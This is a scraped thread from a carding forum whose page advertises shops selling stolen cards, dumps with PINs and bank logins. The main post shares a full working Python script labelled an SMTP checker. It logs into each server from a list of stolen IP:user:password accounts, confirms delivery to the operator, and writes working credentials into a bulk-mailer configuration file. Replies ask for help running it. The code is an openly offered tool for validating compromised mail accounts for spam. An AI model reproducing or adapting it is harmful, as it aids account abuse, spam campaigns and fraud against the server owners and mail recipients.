BPC Squad Bank Paypal And Cards | Carders Forum | Carding Forum

- Advertisement Area (For purchasing Ads or Banner contact ) Jabber [email protected] -(Telegram : @bpclover) -



Jerry's Store Excellent bases | AVS checker
Cerberux.CC The king shop with new checker feature attached + high quality spam cards direct from inbox.
Algae For Sale Global rare CC, Best Quality
CC+CVV Private Base Wholesale & Retail | Rare BINs
Bankman.biz Merchants, Banks US/EU, Crypto
BIGSTACKS DUMPS+PINS, EBT+PINS, CC+CVV




- Advertisement Area (For purchasing Ads or Banner contact )-Jabber-[email protected]

Best Regards
BPC Team







-BPCFORUM-  Registration Opened ####.


We are the Best one Carding Forum on Internet And you choose the right place to start Carding World so Enjoy your time with bpc , Also bpc is not responsible for any kind of post Because we are not a post owner So all stuff you will use at your own risk and If you face any kind of problem please feel free to contact with us.. Telegram : @bpclover
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


Smtp Checker Python
#1
Old SMTP Checker, Still Working

All Credit To Old Hackers Smile

Code:
#!usr/bin/python
#more tools

import sys, smtplib, socket, time
from smtplib import SMTP

socket.setdefaulttimeout(5)    # smtp default timeout, change number to speed up large lists

def printHelp():
   print '\nHow to use it ? There you go :) -- > ./darkSMTPv.py <accounts> <outputfile>'
   print '\nImportant: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP:USER:PASS\n'

# Create the message
fromaddr = "YOUR SENDER ADDRES"
toaddr = "YOUR EAMIL FOR RECIVE SMTP RESULTS"
#toaddr = "YOUR EAMIL FOR RECIVE SMTP RESULTS"
message = """To: %s
From: %s
Subject: WELCOME HOME BROTHER...

WELCOME HOME BROTHER , WE MISS YOU ALL :( MOM DAD DIED 7 YEARS AGO :'(

""" % (toaddr,fromaddr)

print "\n     _            _     _____ __  __ _______ _____        "
print "    | |          | |   / ____|  \/  |__   __|  __ \       "
print "  __| | __ _ _ __| | _| (___ | \  / |  | |  | |__) |_   __"
print " / _` |/ _` | '__| |/ /\___ \| |\/| |  | |  |  ___/\ \ / /"
print "| (_| | (_| | |  |   < ____) | |  | |  | |  | |     \ V / "
print " \__,_|\__,_|_|  |_|\_\_____/|_|  |_|  |_|  |_|      \_/  \n"
print "\n This is not stopping here! ... To be continued."
print "More features will be added soon. For bugs p47r1ckro[at]gmail[dot]com\n"
print "_______________________________________________________________________"


def timer():
       now = time.localtime(time.time())
       return time.asctime(now)

def sendchk(listindex, host, user, password):   # seperated function for checking
    try:
        smtp = smtplib.SMTP(host)
        smtp.login(user, password)
        code = smtp.ehlo()[0]
        if not (200 <= code <= 299):
            code = smtp.helo()[0]
            if not (200 <= code <= 299):
                raise SMTPHeloError(code, resp)
        smtp.sendmail(fromaddr, toaddr, message)
        print "\n\t[!] Email Sent Successfully:",host, user, password
        print "\t[!] Message Sent Successfully\n"
        LSstring = host+":"+user+":"+password+"\n"
        nList.append(LSstring)        # special list for AMS file ID's
        LFile = open(output, "a")
        LFile.write(LSstring)         # save working host/usr/pass to file
        LFile.close()
        AMSout = open("AMSlist.txt", "a")
        AMSout.write("[Server"+str(nList.index(LSstring))+"]\nName="+str(host)+"\nPort=25\nUserID=User\nBccSize=50\nUserName="+str(user)+"\nPassword="+str(password)+"\nAuthType=0\n\n")
        smtp.quit()
    except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
        print "[-] Login Failed:", host, user, password
        pass

if len(sys.argv) != 3:
   printHelp()
   exit(1)

# Do not change anything below.
accounts = sys.argv[1]
output = sys.argv[2]

try:
   handle = list(open(accounts))
except:
    print"\n[+] We were unable to open the SMTP filelist. Check again your path and try again."
    print"\n[+] Ciao...."

#listindex = 0
nList = []
for line in handle:
    try:
        host = line.split(':')[0]
        user = line.split(':')[1].replace('\n', '')
        password = line.split(':')[2].replace('\n', '')
        sendchk(handle.index(line), host, user, password)
    except:
        print '\n[+] We have found a error in your accounts list'
        print host, user
        print '\n[!] IMPORTANT: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP:USER:PASS'
        print '\n[-] Exiting....\n'
        exit(1)

print "[!] Ended at: " + timer() + ""
Find Rate
Reply

#2
Code:
./darkSMTPv.py <accounts> <outputfile>

im trying to do
Code:
./darkSMTPv.py accounts.txt<<< got bulk smtp within IP/HOST:USER:PASS  AND OUTPUTFILE.TXT

its not working for me where did i can the mistake
Find Rate
Reply

#3
I tried also and not working...
Find Rate
Reply


Digg   Delicious   Reddit   Facebook   Twitter   StumbleUpon  


Possibly Related Threads…
Thread Author Replies Views Last Post
  Absolute Python beginer [Ace] 12 12,028 06-02-2018, 08:37 AM
Last Post: whatpigs
  Patator v0.5 Python - Best Cracker subject0 1 4,049 04-23-2018, 12:49 AM
Last Post: bobhojunk
  Python Pocket reference [Ace] 3 4,752 04-23-2018, 12:46 AM
Last Post: bobhojunk
  Learning Python [Ace] 6 7,247 02-14-2017, 01:56 PM
Last Post: alioujalan
  Python Fast [Ace] 11 9,257 02-09-2017, 11:59 PM
Last Post: alioujalan
  Start Learning - Python Ruby PHP Pentest And Other subject0 2 3,445 01-22-2017, 11:41 PM
Last Post: Hern314
  Brute SSH Python 2016 subject0 0 2,920 11-20-2016, 02:50 PM
Last Post: subject0
  Enumerate Users Wordpress 2016 Python subject0 0 2,807 11-20-2016, 02:49 PM
Last Post: subject0
  Ip Range Maker Python subject0 0 2,931 11-20-2016, 12:24 PM
Last Post: subject0
Thumbs Up Ip Safe Python - Spammers Hackers Carders subject0 0 2,675 11-19-2016, 09:14 PM
Last Post: subject0



Users browsing this thread:
1 Guest(s)

 
Carding forum